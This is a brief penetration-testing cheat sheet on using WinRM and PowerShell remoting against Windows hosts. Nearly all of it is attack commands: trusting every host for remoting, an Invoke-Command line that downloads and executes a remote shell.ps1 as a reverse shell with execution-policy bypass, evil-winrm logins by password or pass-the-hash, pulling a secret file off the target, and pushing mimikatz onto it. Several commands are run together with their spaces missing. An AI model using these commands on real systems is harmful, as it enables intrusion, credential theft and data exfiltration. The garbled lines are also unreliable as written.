We first have to configure our attack machine to work with WinRM as well. We need to enable it and add any "victims" as trusted hosts. From an elevated PowerShell prompt, run the following two commands:
# Target Windows TerminalPS> Enable-PSRemoting-ForcePS> Set-Itemwsman:\localhost\client\trustedhosts*
Execute Commands via PS Remoting
# Target Windows Terminal# Run a reverse shellPS> Invoke-Command -ComputerName <computername> -ScriptBlock {cmd /c "powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.10.10:8080/shell.ps1')"}
# Run a commandPS> Invoke-Command-computername<computername>-ScriptBlock{ipconfig/all} [-credential DOMAIN\username]
Using Evil-WinRm
# Install geminstallevil-winrm# Remote accessevil-winrm-uAdministrator-p'<Password>'-i<IP>evil-winrm-u<username>-H<Hash>-i<IP># File transferdownload# download to your kali# download C:\temp\supersecret.txt /opt/Juggernaut/JUGG-Backup/supersecret.txtupload# upload to a target machine# upload /opt/Windows/exploits/executables/mimikatz.exe C:\temp\mimikatz.exe